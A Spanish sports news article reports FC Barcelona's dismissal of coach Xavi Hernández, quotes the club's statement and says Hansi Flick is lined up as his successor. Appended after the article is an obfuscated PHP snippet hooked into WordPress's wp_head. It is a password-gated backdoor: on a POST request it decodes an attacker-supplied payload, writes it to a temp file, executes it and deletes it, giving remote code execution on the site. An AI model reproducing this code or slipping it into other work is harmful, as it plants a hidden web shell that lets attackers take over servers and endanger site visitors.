Laporta destituye a Xavi

El club blaugrana ha anunciado en un comunicado que Xavi deja de ser el entrenador del Barça tras una temporada aciaga y tras su discurso derrotista antes del Almería.

Punto final a Xavi, tras una cumbre imprevista en la Ciutat Esportiva en la que se han precipitado los acontecimientos pese a quedar pendiente el último partido de LaLiga ante el Sevilla. Xavi llegó como el salvador, ganó una Liga y una Supercopa en lo que parecía que iba a ser una “nueva era” del Barça pero con el paso del tiempo el efecto se fue diluyendo y el equipo se derrumbó, hasta tocar fondo en una temporada en la que el Barça se queda en blanco y en la que el propio entrenador anunció a finales de enero su dimisión en diferido tras perder de forma catastrófica ante el Villarreal (3-5) en Montjuïc.

El FC Barcelona volvió a tirar de improvisación después de haber anunciado durante toda la semana que la reunión decisiva para comunicar a Xavi su futuro se realizaría la próxima semana después de jugar el último partido de LaLiga ante el Sevilla en el Ramón Sánchez Pizjuán. Según el club, para “no eclipsar la final de la Champions femenina y darle todo el protagonismo al encuentro ante el Olympique de Lyon” de mañana sábado en Bilbao. Pues bien, otra vez todo se fue al traste en un golpe de teatro tan ridículo como los que llevan acaeciendo en el club desde hace un mes.

Hay que recordar que justamente hoy se cumple un mes de la famosa cena del sushi, en la que Joan Laporta confirmó a Xavi en su puesto después de que éste hubiese anunciado tras jugar contra el Villarreal que abandonaba el club el 30 de junio de manera gratuita.

Al mediodía del viernes, mientras Xavi Hernández dirigía su penúltima sesión al frente de la primera plantilla del equipo, Joan Laporta se presentó en la Ciutat Esportiva, donde se reunió con Deco primero y luego con Rafael Yuste, vicepresidente deportivo que se incorporó más tarde.

Al final de la sesión preparatoria, estos miembros de la comisión deportiva convocaron a Xavi y a sus colaboradores para decirles que ya no contaban con ellos de cara a la próxima temporada, pero que iban a poder dirigir el último partido el domingo en el Sánchez Pizjuán. Minutos después apareció el comunicado público del Barcelona que daba oficialidad a un sainete que se inició justo hace un mes cuando Laporta, Deco y Xavi comparecieron en rueda de prensa para anunciar que el técnico se quedaba horas después de una junta directiva en la que se dio el OK al relevo del de Terrassa por Hansi Flick.

Luego vino el arrepentimiento, la esperada marcha atrás, el acto de euforia desmedida Laporta-Xavi y toda la Junta para celebrar lo inaudito: la continuidad de un técnico con contrato. Ni renovación, ni fichaje. “Xavi se queda” era el eslogan, meme, que circulaba por las redes. “Tenemos la satisfacción de comunicar que Xavi seguirá como entrenador del primer equipo”, empezaba entusiasmado Laporta su discurso. “Toda la junta directiva apoya a Xavi”, decía el presidente pese a una reunión mañanera en la que hubo fuertes discrepancias. “Ilusiones intactas”, “proyecto ganador”, “consenso”, “apoyo”, “equipo”, “unión”…, se oyó en aquella rueda de prensa.

Pero el discurso cambió. Las declaraciones pesimistas de Xavi antes del partido ante el Almería fueron la puntilla del técnico, que gastó las siete vidas ganadas en su época de jugador. Xavi insistió en público sobre la falta de recursos económicos del club para hacer frente a operaciones importantes y la necesidad de reforzar la plantilla “si no queremos que todo siga igual”, haciéndose menor ante el Madrid y diciendo que sería difícil “competir en Europa”. Tampoco gustó su alusión al fichaje de Vitor Roque, ya que fue él quien lo pidió en enero. Por todo esto, Laporta enfureció y llegó el tsunami que ha acabado con la destitución del técnico de Terrassa, tres años después. Xavi, fuera pese a tener contrato hasta 2025. Comienza la era Flick, que será presentado la semana que viene.

El comunicado del Barça

Xavi Hernández dejará de ser el entrenador a final de temporada. En un encuentro que se ha producido en la Ciudad Deportiva Joan Gamper, el presidente Joan Laporta ha comunicado a Xavi Hernández que no continuará como entrenador del primer equipo en la temporada 2024-25.

El FC Barcelona quiere agradecer a Xavi su labor como entrenador, que se suma a una carrera inigualable como jugador y capitán del equipo, y le desea toda la suerte del mundo.

Xavi Hernández dirigirá este domingo en Sevilla su último partido como técnico del primer equipo.

En los próximos días, el FC Barcelona informará de la nueva estructura del primer equipo.

Flick, cerrado

El Barça tiene apalabrada la llegada del alemán Hans Flick como técnico la próxima temporada, como ya publicó este diario ayer jueves. El club, una vez que ya se ha hecho oficial el despido de Xavi, quiere presentar al técnico alemán el jueves o viernes de la próxima semana para contraprogramar la final de la Champions de Wembley.

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}